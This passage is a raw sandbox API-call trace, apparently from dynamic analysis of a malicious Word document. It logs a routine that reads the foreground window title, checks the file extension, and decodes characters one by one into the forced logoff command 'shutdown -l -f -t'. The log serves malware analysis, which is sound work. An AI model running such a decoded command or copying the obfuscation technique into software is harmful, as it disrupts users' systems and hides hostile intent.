lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.686] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.687] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.687] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.687] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.688] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.688] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.689] GetForegroundWindow () returned 0x20086 [0181.689] GetLastError () returned 0x0 [0181.689] SysStringLen (param_1=" ") returned 0xff [0181.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.689] SysStringLen (param_1=" ") returned 0xff [0181.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.689] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.690] GetLastError () returned 0x0 [0181.690] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.690] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.691] SysStringLen (param_1="Pr") returned 0x2 [0181.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0181.691] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0181.691] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0181.691] GetFocus () returned 0x0 [0181.691] lstrlenA (lpString="Pr") returned 2 [0181.691] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0181.692] IsWindow (hWnd=0x103c4) returned 1 [0181.692] IsWindow (hWnd=0x103c4) returned 1 [0181.692] IsWindow (hWnd=0x103c4) returned 1 [0181.692] IsWindow (hWnd=0x103c4) returned 1 [0181.693] GetFocus () returned 0x0 [0181.694] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.694] GetFocus () returned 0x0 [0181.694] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0181.694] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0181.694] GetFocus () returned 0x0 [0181.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0181.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0181.697] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.697] VarBstrCmp (bstrLeft="Pr", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.697] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0181.697] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0181.697] GetTickCount () returned 0x1d1a266 [0181.698] IsWindowVisible (hWnd=0x103b8) returned 0 [0181.698] Sleep (dwMilliseconds=0x0) [0181.756] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0181.757] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0181.768] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0181.768] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0181.769] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0181.769] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.769] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0181.770] GetTickCount () returned 0x1d1a2a4 [0181.770] GetTickCount () returned 0x1d1a2a4 [0181.770] GetTickCount () returned 0x1d1a2a4 [0181.770] GetTickCount () returned 0x1d1a2a4 [0181.770] IsWindowVisible (hWnd=0x103b8) returned 0 [0181.771] Sleep (dwMilliseconds=0x0) [0181.818] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0181.819] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0181.821] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0181.821] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0181.821] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0181.821] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.822] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0181.822] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0181.822] IsWindow (hWnd=0x103bc) returned 1 [0181.822] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0181.823] IsIconic (hWnd=0x103b8) returned 0 [0181.823] GetParent (hWnd=0x103bc) returned 0x103b8 [0181.823] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0181.823] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0181.823] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0181.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.824] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.825] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.825] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.825] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.826] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.826] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.827] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.827] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.828] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.828] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.829] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.829] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.830] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.830] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.831] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.831] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.832] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.832] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.833] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.833] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.834] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.834] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.835] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.835] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.836] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.836] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.836] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.837] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.837] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.838] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.838] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.839] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.839] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.840] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, 